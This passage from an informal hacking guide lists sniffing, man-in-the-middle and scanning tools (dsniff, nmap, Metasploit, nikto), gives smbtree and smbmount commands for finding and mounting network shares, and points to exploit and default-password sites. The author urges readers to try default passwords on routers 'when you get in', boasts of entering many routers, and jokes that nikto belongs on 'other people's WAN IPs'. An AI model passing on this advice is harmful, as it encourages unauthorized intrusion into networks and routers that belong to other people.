Ethereal/Wireshark=
  Packet sniffer.
Dsniff=
  Used for MITM (man in the middle) attacks; should be used with
  webmitm, dnsspoof, arpspoof, fragrouter, and wireshark.
nmap=
  Find open ports to exploit with Metasploit.
Metasploit=
  Skiddy way to get into computers and spawn shells and such.
ngrep=
  sniff sniff.
nikto=
  Blasts httpd servers running anywhere with a preconfigured set of
  checks. Pretty scary, and should only be run from other people's WAN
  IPs ;-)
smbtree -N=
  Search for shares. You can also do so graphically by opening nautilus
  or firefox and going to "smb:///"
smbmount //computername/shareddocs /mnt/network
  (the share path is //server/share; the workgroup is not part of it)
============================================================================
Sites to bookmark=

http://www.cirt.net/cgi-bin/passwd.pl
  For when you get in; you MUST try the default passwords against the
  routers. Usually the router is at x.x.x.1, like 192.168.1.1,
  192.168.0.1, 10.10.10.1, or 123.123.123.1 etc. 90% of the routers I
  have been in haven't been changed!

http://zombie.el.cx/texts/hacking/pdfs/
  some files...

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
5. Video Tutorials
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Videos help out a lot when learning a new piece of software. Just look at
how successful Camtasia Studio is. There are videos everywhere, but you
want to watch some that are informational along with the videos that are
entertaining. Videos with narration, such as those found at irongeek,
are very informative, whereas some that simply play music and have few
captions are also informative, but only to people with a little more
experience, especially with the Linux OS.

http://www.irongeek.com/
http://www.milw0rm.com/
http://www.offensive-security.com/
http://zombie.el.cx/images/saving-mp3.html

There's a whole lot more; homemade videos can be found in the
remote-exploit forums, I bet, from people who have made them. Just do a
Google search.